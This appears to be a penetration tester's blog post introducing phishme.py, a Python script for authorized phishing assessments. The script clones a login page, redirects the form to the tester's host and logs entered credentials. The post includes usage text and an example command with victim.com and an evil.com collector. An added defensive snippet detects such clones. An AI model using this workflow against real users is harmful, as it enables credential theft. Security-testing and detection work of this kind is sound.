Adventures in Penetration Testing: Let’s Go Phishing

Phishing and social engineering engagements are often unique to each customer; however, I often find that a customer just wants one of their web pages, like their web email sign-on page, copied. The link to this phishing site is then emailed out to the victims to determine their susceptibility to clicking on the link as well as entering credentials.

The standard process is to use httrack to download a copy of the page, then modify the FORM tag to POST/GET to our phishing site, save whatever values are submitted, and redirect to the real page. This is a bit of a pain due to the process being fairly manual in nature. I know you can use something like the Social Engineering Toolkit (SET), but that can be a pain to set up and is often a little heavy duty for what my company needs.

I recently began learning Python, which I love so far by the way, and thought that this might be a good area in which I could develop something useful. So I wrote a phishing script that will take the URL you point it at and replicate it, replacing the FORM ACTION with your host, logging all entered data, and forwarding the victim on to their site (along with what they submitted).

The script does this by downloading the base HTML for the page and ensuring A, IMG, LINK, and SCRIPT SRC tags point back to the original site, while modifying the FORM ACTION tag to point back at the malicious site. This is simple in that very little is downloaded and it leaves little room for something to get messed up in the visual presentation.

The script relies on Mechanize, BeautifulSoup4, and CherryPy. These can be installed with:

  easy_install mechanize beautifulsoup4 cherrypy

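An added example, not part of the original post or of phishme.py: because the clone described above leaves A, IMG, LINK, and SCRIPT SRC pointing at the original site and rewrites only FORM ACTION, a defender can flag such pages by comparing where a page loads its resources from with where its forms post. The function name `clone_indicators`, the 0.8 threshold, and the example.com / example.net hostnames are assumptions made for illustration.

```python
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Tag -> URL attribute: the tags the post says keep pointing at the original site.
RESOURCE_ATTRS = {"a": "href", "img": "src", "link": "href", "script": "src"}

class HostCollector(HTMLParser):
    """Count hosts referenced by resource tags and collect FORM ACTION hosts."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.resource_hosts = Counter()
        self.form_hosts = set()

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            # A missing or relative action resolves against the serving page.
            target = urljoin(self.page_url, attrs.get("action") or "")
            self.form_hosts.add(urlsplit(target).hostname)
        elif attrs.get(RESOURCE_ATTRS.get(tag)):
            target = urljoin(self.page_url, attrs[RESOURCE_ATTRS[tag]])
            host = urlsplit(target).hostname
            if host:  # skip mailto:, javascript: and similar
                self.resource_hosts[host] += 1

def clone_indicators(page_url, html, threshold=0.8):
    """Return (asset_host, form_hosts) when most resources load from one host
    other than the serving host while a form posts elsewhere; else None."""
    parser = HostCollector(page_url)
    parser.feed(html)
    total = sum(parser.resource_hosts.values())
    if not total or not parser.form_hosts:
        return None
    asset_host, count = parser.resource_hosts.most_common(1)[0]
    foreign = asset_host != urlsplit(page_url).hostname and count / total >= threshold
    mismatched = sorted(h for h in parser.form_hosts if h and h != asset_host)
    return (asset_host, mismatched) if foreign and mismatched else None

# Constructed sample page (placeholder hostnames, not taken from the post).
SAMPLE = """<html><head><link rel="stylesheet" href="https://portal.example.com/login.css">
<script src="https://portal.example.com/login.js"></script></head><body>
<img src="https://portal.example.com/logo.png"><a href="https://portal.example.com/help">Help</a>
<form method="post" action="https://collector.example.net/"><input name="user"></form>
</body></html>"""

if __name__ == "__main__":
    print(clone_indicators("https://collector.example.net/", SAMPLE))
```

A legitimate page that serves nearly all of its assets from a separate CDN host matches the same pattern, so treat a hit as a triage signal to review rather than a verdict.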
 
Some features that I would like to add include:

  • Integrate with the Browser Exploitation Framework (BeEF)
  • Add the ability to step through a few clicks, rather than a simple one page reflect back and then redirect

This is the first script I have written in Python, so it is probably pretty ugly to anyone with experience in the language. You can download here and enjoy with:

usage: phishme.py [-h] --phish PHISH --replace REPLACE [--port PORT] [--ssl]
               [--sslchain SSLCHAIN] [--sslcert SSLCERT] [--sslkey SSLKEY]

Automatically setup a phishing site.

optional arguments:
  -h, --help           show this help message and exit
  --phish PHISH        the full URL to phish back to the victim (must include
                       http(s):// (default: None)
  --replace REPLACE    the IP/FQDN to replace FORM actions with (must include
                       http(s):// (default: None)
  --port PORT          the port to start the listening web server on (default:
                       80)
  --ssl                enable SSL on the running port (default: 0)
  --sslchain SSLCHAIN  certificate chain file to use when ssl option is
                       enabled (default: chain.crt)
  --sslcert SSLCERT    certificate file to use to use when ssl option is
                       enabled (default: ssl.crt)
  --sslkey SSLKEY      private key file to use to use when ssl option is
                       enabled (default: ssl.key)

Example: phishme.py --phish https://www.victim.com/login.php --replace
https://www.evil.com --port 443 --ssl --sslchain chain.crt --sslcert ssl.crt
--sslkey ssl.key

 

Comment back for some optional features that you think would be useful for this lightweight script.
